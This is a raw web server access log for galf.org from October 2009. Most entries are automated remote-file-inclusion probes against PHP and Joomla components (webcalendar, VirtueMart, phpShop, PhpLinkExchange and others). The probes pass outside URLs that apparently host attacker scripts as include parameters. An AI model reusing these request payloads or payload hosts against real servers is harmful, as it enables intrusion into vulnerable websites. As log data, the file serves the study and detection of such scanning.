211.115.89.97 - - [26/Oct/2009:05:24:27 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:24:28 -0700] "GET /logs/access_090316.log//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:24:28 -0700] "GET /logs//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:24:28 -0700] "GET /logs/access_090914.log//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.231.3.136 - - [26/Oct/2009:05:25:14 -0700] "GET /logs/access_090803.log//?_SERVER[DOCUMENT_ROOT]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.231.3.136 - - [26/Oct/2009:05:25:14 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
222.231.3.136 - - [26/Oct/2009:05:25:14 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.231.3.136 - - [26/Oct/2009:05:26:01 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
222.231.3.136 - - [26/Oct/2009:05:26:06 -0700] "GET /logs/access_090803.log//?_SERVER[DOCUMENT_ROOT]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.231.3.136 - - [26/Oct/2009:05:26:06 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.38 - - [26/Oct/2009:05:26:08 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=37&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Creative ZENcast v1.02.11)" "www.galf.org"
222.231.3.136 - - [26/Oct/2009:05:29:13 -0700] "GET /logs/access_091005.log//?_SERVER[DOCUMENT_ROOT]=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:29:35 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:29:35 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:29:35 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:29:35 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:29:56 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:29:56 -0700] "GET /logs/access_090914.log//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:29:56 -0700] "GET /logs//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:30:08 -0700] "GET /logs/access_090316.log//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.43 - - [26/Oct/2009:05:30:24 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=63&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; ESB{ED54DCA0-ECBF-11D8-9DD2-0050228AF33B})" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:30:42 -0700] "GET /logs/access_090914.log%20%20//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:30:42 -0700] "GET /logs/access_090316.log%20%20//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:30:42 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:30:43 -0700] "GET /logs//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.40 - - [26/Oct/2009:05:31:04 -0700] "GET /labia23portugues/index.htm HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SIMBAR={AC2B0809-A339-4e16-AF40-F198FFFF7AF6}; .NET CLR 1.1.4322)" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:31:56 -0700] "GET /logs//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:31:56 -0700] "GET /logs/access_090914.log//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:31:56 -0700] "GET /logs/access_090316.log//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:31:56 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:33:03 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.98.171.91 - - [26/Oct/2009:05:33:06 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.98.171.91 - - [26/Oct/2009:05:33:06 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.98.171.91 - - [26/Oct/2009:05:33:40 -0700] "GET /logs////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:33:40 -0700] "GET /logs/access_090928.log%20%20////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:33:41 -0700] "GET ///PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:33:42 -0700] "GET /logs/access_090413.log%20%20////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [26/Oct/2009:05:34:02 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [26/Oct/2009:05:34:03 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [26/Oct/2009:05:34:03 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [26/Oct/2009:05:35:42 -0700] "GET ///PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [26/Oct/2009:05:35:42 -0700] "GET /logs/access_090323.log%20%20////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [26/Oct/2009:05:35:42 -0700] "GET /logs////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [26/Oct/2009:05:35:58 -0700] "GET ///PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [26/Oct/2009:05:35:58 -0700] "GET /logs/access_090323.log%20%20////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [26/Oct/2009:05:35:58 -0700] "GET /logs////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:36:25 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:36:25 -0700] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:36:25 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [26/Oct/2009:05:36:39 -0700] "GET /logs/access_090928.log%20%20////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [26/Oct/2009:05:36:50 -0700] "GET /logs/access_090928.log%20%20////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:36:55 -0700] "GET /logs/access_090316.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:37:01 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:37:01 -0700] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:37:01 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:37:01 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:37:01 -0700] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:37:02 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:37:14 -0700] "GET /logs/access_090316.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:37:20 -0700] "GET /logs/access_090316.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:37:43 -0700] "GET ///PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:37:43 -0700] "GET /logs/access_090928.log%20%20////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:37:43 -0700] "GET /logs/access_090413.log%20%20////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:37:43 -0700] "GET /logs////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:38:16 -0700] "GET /logs/access.log//Stats/index.html%20%20/components/com_extended_registration/registration_detailed.inc.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.98.171.91 - - [26/Oct/2009:05:38:16 -0700] "GET /logs//Stats/index.html%20%20/components/com_extended_registration/registration_detailed.inc.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.98.171.91 - - [26/Oct/2009:05:38:16 -0700] "GET /Stats/index.html%20%20/components/com_extended_registration/registration_detailed.inc.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.115.89.97 - - [26/Oct/2009:05:39:55 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:39:55 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:39:55 -0700] "GET /logs/access_091005.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:40:05 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:40:05 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:40:05 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:40:05 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
72.30.142.167 - - [26/Oct/2009:05:40:12 -0700] "GET /logs/?D=A HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:40:15 -0700] "GET /logs/access_090525.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [26/Oct/2009:05:41:21 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.98.171.91 - - [26/Oct/2009:05:41:30 -0700] "GET /logs/access.log%20%20//Stats/index.html%20%20/components/com_extended_registration/registration_detailed.inc.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.115.89.97 - - [26/Oct/2009:05:41:59 -0700] "GET /logs/access_090525.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:41:59 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:41:59 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:42:19 -0700] "GET /logs/access_090928.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [26/Oct/2009:05:42:26 -0700] "GET /logs/access_090928.log////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [26/Oct/2009:05:42:30 -0700] "GET /logs/access_090413.log////PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:44:16 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:44:16 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:44:16 -0700] "GET /logs/access_091012.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:44:20 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:44:20 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [26/Oct/2009:05:44:20 -0700] "GET /logs/access_091012.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:45:37 -0700] "GET /logs/access.log//Stats/index.html%20%20/components/com_extended_registration/registration_detailed.inc.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [26/Oct/2009:05:45:37 -0700] "GET /Stats/index.html%20%20/components/com_extended_registration/registration_detailed.inc.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [26/Oct/2009:05:45:37 -0700] "GET /logs//Stats/index.html%20%20/components/com_extended_registration/registration_detailed.inc.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [26/Oct/2009:05:45:57 -0700] "GET /Stats/index.html%20%20/components/com_extended_registration/registration_detailed.inc.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [26/Oct/2009:05:45:57 -0700] "GET /logs//Stats/index.html%20%20/components/com_extended_registration/registration_detailed.inc.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [26/Oct/2009:05:45:57 -0700] "GET /logs/access.log//Stats/index.html%20%20/components/com_extended_registration/registration_detailed.inc.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
174.143.3.188 - - [26/Oct/2009:05:49:33 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:49:34 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:49:34 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:49:34 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:51:12 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:51:12 -0700] "GET /logs/access_091005.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:51:12 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:51:32 -0700] "GET /logs/access_090525.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:51:58 -0700] "GET /logs/access.log%20%20//Stats/index.html%20%20/components/com_extended_registration/registration_detailed.inc.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.115.89.97 - - [26/Oct/2009:05:53:27 -0700] "GET /logs/access_090525.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:53:28 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:53:28 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:53:41 -0700] "GET /logs/access.log%20%20//Stats/index.html%20%20/components/com_extended_registration/registration_detailed.inc.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.115.89.97 - - [26/Oct/2009:05:53:47 -0700] "GET /logs/access_090928.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
